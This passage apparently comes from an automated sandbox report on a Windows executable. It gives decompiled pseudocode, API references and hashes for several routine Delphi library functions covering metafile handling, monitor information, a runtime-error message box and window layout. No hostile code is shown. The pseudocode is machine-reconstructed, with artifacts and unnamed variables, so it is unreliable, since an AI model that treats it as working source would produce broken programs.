                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction ID: 44c40cd423b67ccf78083ae2a30d6f27b72ddf14c8e4186e4a4d03f68d1a050f
                                                                                • Opcode Fuzzy Hash: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction Fuzzy Hash: FC412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422380, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E00422380(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042221C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
					E004200B4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004200B4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004200B4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E004224F6);
				return E0040274C(_v16);
			}


























                                                                                0x00422381
                                                                                0x00422383
                                                                                0x0042238c
                                                                                0x0042238f
                                                                                0x00422392
                                                                                0x00422396
                                                                                0x004223a8
                                                                                0x004223b2
                                                                                0x004223c2
                                                                                0x004223c2
                                                                                0x004223c7
                                                                                0x004223d3
                                                                                0x004223d6
                                                                                0x004223e4
                                                                                0x004223f2
                                                                                0x004223fc
                                                                                0x00422405
                                                                                0x00422407
                                                                                0x00422407
                                                                                0x00422427
                                                                                0x00422444
                                                                                0x00422447
                                                                                0x00422450
                                                                                0x00422455
                                                                                0x0042245a
                                                                                0x00422470
                                                                                0x00422472
                                                                                0x00422477
                                                                                0x00422479
                                                                                0x00422479
                                                                                0x0042248b
                                                                                0x00422490
                                                                                0x0042249a
                                                                                0x004224a0
                                                                                0x004224a5
                                                                                0x004224ac
                                                                                0x004224c4
                                                                                0x004224c6
                                                                                0x004224cb
                                                                                0x004224cd
                                                                                0x004224cd
                                                                                0x004224d2
                                                                                0x004224d8
                                                                                0x004224db
                                                                                0x004224de
                                                                                0x004224ee

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction ID: 665570bac44c4c60e8fe7534a9a744b194c8e8f5101b8de97ce5c6e0b6c4a068
                                                                                • Opcode Fuzzy Hash: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction Fuzzy Hash: 7F412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004264B4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E004264B4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x487ac0 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A28();
						}
						_t24 = 1;
					}
				} else {
					 *0x487aa4 = E00426184(4, _t23,  *0x487aa4, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                                0x004264bd
                                                                                0x004264c0
                                                                                0x004264ca
                                                                                0x004264ef
                                                                                0x004264f7
                                                                                0x00426517
                                                                                0x0042651c
                                                                                0x00426527
                                                                                0x00426532
                                                                                0x0042653c
                                                                                0x0042653d
                                                                                0x0042653e
                                                                                0x0042653f
                                                                                0x00426540
                                                                                0x00426541
                                                                                0x0042654b
                                                                                0x0042654d
                                                                                0x00426555
                                                                                0x00426556
                                                                                0x00426556
                                                                                0x0042655b
                                                                                0x0042655b
                                                                                0x004264cc
                                                                                0x004264de
                                                                                0x004264eb
                                                                                0x004264eb
                                                                                0x00426565

                                                                                APIs
                                                                                • GetMonitorInfoA.USER32(?,?), ref: 004264E5
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042650C
                                                                                • GetSystemMetrics.USER32 ref: 00426521
                                                                                • GetSystemMetrics.USER32 ref: 0042652C
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 00426556
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfo
                                                                                • API String ID: 1539801207-1633989206
                                                                                • Opcode ID: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction ID: eb29b155447e2ea08417c78262e00809df11af4c5ac13398b32b6bfbf337f6c7
                                                                                • Opcode Fuzzy Hash: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction Fuzzy Hash: 4B1127317003106FD7208F68BC4476BB7E9EF06750F51492EE90997680D374A9808B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042665C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 47%
                                                                                			E0042665C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x487ac2 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A28();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x487aac; // 0x42665c
					 *0x487aac = E00426184(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x487aac(_t27, _t29);
				}
				return _t24;
			}














                                                                                0x00426665
                                                                                0x00426668
                                                                                0x00426672
                                                                                0x00426697
                                                                                0x0042669f
                                                                                0x004266bf
                                                                                0x004266c4
                                                                                0x004266cf
                                                                                0x004266da
                                                                                0x004266e4
                                                                                0x004266e5
                                                                                0x004266e6
                                                                                0x004266e7
                                                                                0x004266e8
                                                                                0x004266e9
                                                                                0x004266f3
                                                                                0x004266f5
                                                                                0x004266fd
                                                                                0x004266fe
                                                                                0x004266fe
                                                                                0x00426703
                                                                                0x00426703
                                                                                0x00426674
                                                                                0x00426679
                                                                                0x00426686
                                                                                0x00426693
                                                                                0x00426693
                                                                                0x0042670d

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004266B4
                                                                                • GetSystemMetrics.USER32 ref: 004266C9
                                                                                • GetSystemMetrics.USER32 ref: 004266D4
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 004266FE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoW$\fB
                                                                                • API String ID: 2545840971-2659345030
                                                                                • Opcode ID: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction ID: e82b1ccf59c43c2d8bf743638305c59c410ee6f05c7b2395847ba50243c0d1fd
                                                                                • Opcode Fuzzy Hash: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction Fuzzy Hash: 581106327043105FE7208FA5BC447ABB7E8EB45714F52483FEC4597680E774A944CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004041A4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E004041A4(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x487048 == 0) {
					if( *0x46b01c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x48721c == 0xd7b2 &&  *0x487224 > 0) {
						 *0x487234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E0040422C, 2,  &_v4, 0);
				}
			}





                                                                                0x004041ac
                                                                                0x0040420c
                                                                                0x0040421c
                                                                                0x0040421c
                                                                                0x00404222
                                                                                0x004041ae
                                                                                0x004041b7
                                                                                0x004041c7
                                                                                0x004041c7
                                                                                0x004041e3
                                                                                0x00404204
                                                                                0x00404204

                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883,?,00000000), ref: 004041DD
                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883), ref: 004041E3
                                                                                • GetStdHandle.KERNEL32(000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041F8
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041FE
                                                                                • MessageBoxA.USER32 ref: 0040421C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$Message
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1570097196-2970929446
                                                                                • Opcode ID: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction ID: 3cda8e2fd8faf604d14361e06e5260565932c3c5a82abd22b22224aa19730b8a
                                                                                • Opcode Fuzzy Hash: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction Fuzzy Hash: 55F0C2B169434035E62063A46D06F5E26488385B59F204EFFB320F80E293BC98C4476E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00442D8C, Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E00442D8C(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				int _t85;
				void* _t119;
				void* _t120;
				void* _t129;
				struct HDC__* _t138;
				struct HDC__* _t139;
				int _t140;
				void* _t141;

				_t121 = __ecx;
				_t137 = __ecx;
				_v8 = __edx;
				_t120 = __eax;
				_t46 = E00442554(__eax);
				if(_t46 != 0) {
					_t144 = _a4;
					if(_a4 == 0) {
						__eflags =  *(_t120 + 0x54);
						if( *(_t120 + 0x54) == 0) {
							_t140 = E00423960(1);
							 *(_t120 + 0x54) = _t140;
							E00424D78(_t140, 1);
							 *((intOrPtr*)( *_t140 + 0x40))();
							_t121 =  *_t140;
							 *((intOrPtr*)( *_t140 + 0x34))();
						}
						E0041F338( *((intOrPtr*)(E00423F28( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
						E00412984(0,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
						_push( &_v44);
						_t57 = E00423F28( *(_t120 + 0x54));
						_pop(_t129);
						E0041F9D0(_t57, _t129);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E0041FDC4(E00423F28( *(_t120 + 0x54))));
						_push(_v8);
						_push(E00442728(_t120));
						L004260DC();
						E00412984(_a16, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
						_v12 = E0041FDC4(E00423F28( *(_t120 + 0x54)));
						E0041F338( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000014, _t137, _t141, __eflags);
						_t138 = E0041FDC4(_t137);
						SetTextColor(_t138, 0xffffff);
						SetBkColor(_t138, 0);
						_t85 = _a16 + 1;
						__eflags = _t85;
						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
						E0041F338( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000010, _t137, _t141, _t85);
						_t139 = E0041FDC4(_t137);
						SetTextColor(_t139, 0xffffff);
						SetBkColor(_t139, 0);
						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
					}
					_push(_a8);
					_push(E00442350(_t144));
					E00442D64(_t120, _t144);
					_push(E00442350(_t144));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E0041FDC4(__ecx));
					_push(_v8);
					_t119 = E00442728(_t120);
					_push(_t119);
					L004260DC();
					return _t119;
				}
				return _t46;
			}



















                                                                                0x00442d8c
                                                                                0x00442d95
                                                                                0x00442d97
                                                                                0x00442d9a
                                                                                0x00442d9e
                                                                                0x00442da5
                                                                                0x00442dab
                                                                                0x00442daf
                                                                                0x00442df5
                                                                                0x00442df9
                                                                                0x00442e07
                                                                                0x00442e09
                                                                                0x00442e10
                                                                                0x00442e1c
                                                                                0x00442e24
                                                                                0x00442e26
                                                                                0x00442e26
                                                                                0x00442e39
                                                                                0x00442e4d
                                                                                0x00442e55
                                                                                0x00442e59
                                                                                0x00442e5e
                                                                                0x00442e5f
                                                                                0x00442e64
                                                                                0x00442e66
                                                                                0x00442e68
                                                                                0x00442e6a
                                                                                0x00442e6c
                                                                                0x00442e6e
                                                                                0x00442e70
                                                                                0x00442e7f
                                                                                0x00442e83
                                                                                0x00442e8b
                                                                                0x00442e8c
                                                                                0x00442ea8
                                                                                0x00442eba
                                                                                0x00442ec5
                                                                                0x00442ed1
                                                                                0x00442ed9
                                                                                0x00442ee1
                                                                                0x00442f03
                                                                                0x00442f03
                                                                                0x00442f06
                                                                                0x00442f13
                                                                                0x00442f1f
                                                                                0x00442f27
                                                                                0x00442f2f
                                                                                0x00000000
                                                                                0x00442f52
                                                                                0x00442db4
                                                                                0x00442dbd
                                                                                0x00442dc0
                                                                                0x00442dca
                                                                                0x00442dcb
                                                                                0x00442dcd
                                                                                0x00442dd2
                                                                                0x00442dd6
                                                                                0x00442dde
                                                                                0x00442de2
                                                                                0x00442de5
                                                                                0x00442dea
                                                                                0x00442deb
                                                                                0x00000000
                                                                                0x00442deb
                                                                                0x00442f5d

                                                                                APIs
                                                                                • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442DEB
                                                                                • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442E8C
                                                                                • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442ED9
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 00442EE1
                                                                                • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00442F06
                                                                                  • Part of subcall function 00442D64: 73452240.COMCTL32(00000000,?,00442DC5,00000000,?), ref: 00442D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: 73452430Color$73452240Text
                                                                                • String ID:
                                                                                • API String ID: 3810274889-0
                                                                                • Opcode ID: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction ID: 8c7c3c46afd78b8adb657da2d6ce0c39d83e9d96557bbb21b825c40a06f345e7
                                                                                • Opcode Fuzzy Hash: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction Fuzzy Hash: 3F512B71700115AFDB40EF6DDD82F9E37E8AF09304F50116AF905EB286CA78EC468B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042E254, Relevance: 12.1, APIs: 8, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E0042E254(void* __eax, void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HDWP__* _v28;
				int _v32;
				char _v36;
				struct tagTEXTMETRICA _v92;
				void* __ebx;
				void* __ebp;
				intOrPtr _t85;
				void* _t89;
				void* _t113;
				char _t117;
				intOrPtr* _t119;
				void* _t144;
				void* _t146;
				signed int _t147;
				long _t148;
				signed int _t158;
				intOrPtr _t160;
				struct HDC__* _t175;
				int _t176;
				void* _t179;
				void* _t181;
				intOrPtr _t182;
				intOrPtr _t188;

				_t146 = __ecx;
				_t179 = _t181;
				_t182 = _t181 + 0xffffffa8;
				_t144 = __eax;
				_t85 =  *((intOrPtr*)(__eax + 0x210));
				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
					return _t85;
				} else {
					_t175 = GetDC(0);
					_t89 = SelectObject(_t175, E0041EB60( *((intOrPtr*)(_t144 + 0x68)), _t144, _t146));
					GetTextMetricsA(_t175,  &_v92);
					SelectObject(_t175, _t89);
					ReleaseDC(0, _t175);
					_t176 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8);
					_t147 =  *(_t144 + 0x21c);
					asm("cdq");
					_v8 = (_t176 + _t147 - 1) / _t147;
					asm("cdq");
					_v12 = ( *((intOrPtr*)(_t144 + 0x48)) - 0xa) / _t147;
					_t148 = _v92.tmHeight;
					_v24 =  *((intOrPtr*)(_t144 + 0x4c)) - _t148 - 5;
					asm("cdq");
					_v16 = _v24 / _v8;
					asm("cdq");
					_t34 = _v24 % _v8;
					_t158 = _t34 >> 1;
					if(_t34 < 0) {
						asm("adc edx, 0x0");
					}
					_v20 = _t158 + _t148 + 1;
					_v28 = BeginDeferWindowPos(_t176);
					_push(_t179);
					_push(0x42e3dd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t182;
					_t113 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8) - 1;
					if(_t113 >= 0) {
						_t117 = _t113 + 1;
						_t188 = _t117;
						_v36 = _t117;
						_v24 = 0;
						do {
							_t119 = E00413FA4( *((intOrPtr*)(_t144 + 0x210)), _v24);
							_t172 = _t119;
							 *((intOrPtr*)( *_t119 + 0x70))();
							asm("cdq");
							_v32 = _v24 / _v8 * _v12 + 8;
							if(E004037B0(_t119, _t188) != 0) {
								_v32 = E004350A4(_t144) - _v32 - _v12;
							}
							asm("cdq");
							_v28 = DeferWindowPos(_v28, E0043BD14(_t172), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
							E004355C0(_t172, 1);
							_v24 = _v24 + 1;
							_t81 =  &_v36;
							 *_t81 = _v36 - 1;
						} while ( *_t81 != 0);
					}
					_pop(_t160);
					 *[fs:eax] = _t160;
					_push(0x42e3e4);
					return EndDeferWindowPos(_v28);
				}
			}































                                                                                0x0042e254
                                                                                0x0042e255
                                                                                0x0042e257
                                                                                0x0042e25d
                                                                                0x0042e25f
                                                                                0x0042e269
                                                                                0x0042e3ea
                                                                                0x0042e27c
                                                                                0x0042e283
                                                                                0x0042e28f
                                                                                0x0042e29b
                                                                                0x0042e2a2
                                                                                0x0042e2aa
                                                                                0x0042e2b5
                                                                                0x0042e2ba
                                                                                0x0042e2c3
                                                                                0x0042e2c6
                                                                                0x0042e2cf
                                                                                0x0042e2d2
                                                                                0x0042e2d8
                                                                                0x0042e2e0
                                                                                0x0042e2e6
                                                                                0x0042e2ea
                                                                                0x0042e2f0
                                                                                0x0042e2f1
                                                                                0x0042e2f4
                                                                                0x0042e2f6
                                                                                0x0042e2f8
                                                                                0x0042e2f8
                                                                                0x0042e2fe
                                                                                0x0042e307
                                                                                0x0042e30c
                                                                                0x0042e30d
                                                                                0x0042e312
                                                                                0x0042e315
                                                                                0x0042e321
                                                                                0x0042e324
                                                                                0x0042e32a
                                                                                0x0042e32a
                                                                                0x0042e32b
                                                                                0x0042e32e
                                                                                0x0042e335
                                                                                0x0042e33e
                                                                                0x0042e343
                                                                                0x0042e34c
                                                                                0x0042e352
                                                                                0x0042e35c
                                                                                0x0042e36c
                                                                                0x0042e37b
                                                                                0x0042e37b
                                                                                0x0042e38b
                                                                                0x0042e3ae
                                                                                0x0042e3b5
                                                                                0x0042e3ba
                                                                                0x0042e3bd
                                                                                0x0042e3bd
                                                                                0x0042e3bd
                                                                                0x0042e335
                                                                                0x0042e3c8
                                                                                0x0042e3cb
                                                                                0x0042e3ce
